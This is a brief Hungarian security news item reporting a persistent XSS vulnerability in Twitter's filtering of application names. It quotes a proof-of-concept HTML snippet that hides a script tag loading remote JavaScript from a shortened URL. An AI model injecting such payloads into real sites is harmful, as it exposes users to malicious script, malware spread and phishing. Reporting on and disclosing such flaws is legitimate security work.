Egy  0wn3d_5ys becenevet használó - feltehetően indonéz - Twitter felhasználó perzisztens XSS sebezhetőséget talált a Twitteren. A problémát egy tavaly nyilvánosságra kerülthöz nagyon hasonló hiba okozza. Múlt évben James Salter a Twitter alkalmazásokhoz beállítható URL sszűrésében talált hibát, most pedig az alkalmazás nevének szűrését sikerült kijátszani. Ezen az olvalon részletesen elemzik a bemutatott PoC kódot, a leglényegesebb ez a kódrészlet:

<span>via <a href="hxxp://www.0wn3d-5ys.co.cc" rel="nofollow">Ub­­&shy;erTw­i­&shy;tter<span style="visibility: hidden"&gt; <script src='hxxp://is.gd/cWO66' type='text/javascript'&gt;</script&gt;</a> </span>

A hiba egyebek mellett lehetőséget különböző kártékony kódok terjesztésére a Twitteren keresztül, valamint megkönnyíti az adathalász támadások kivitelezését is.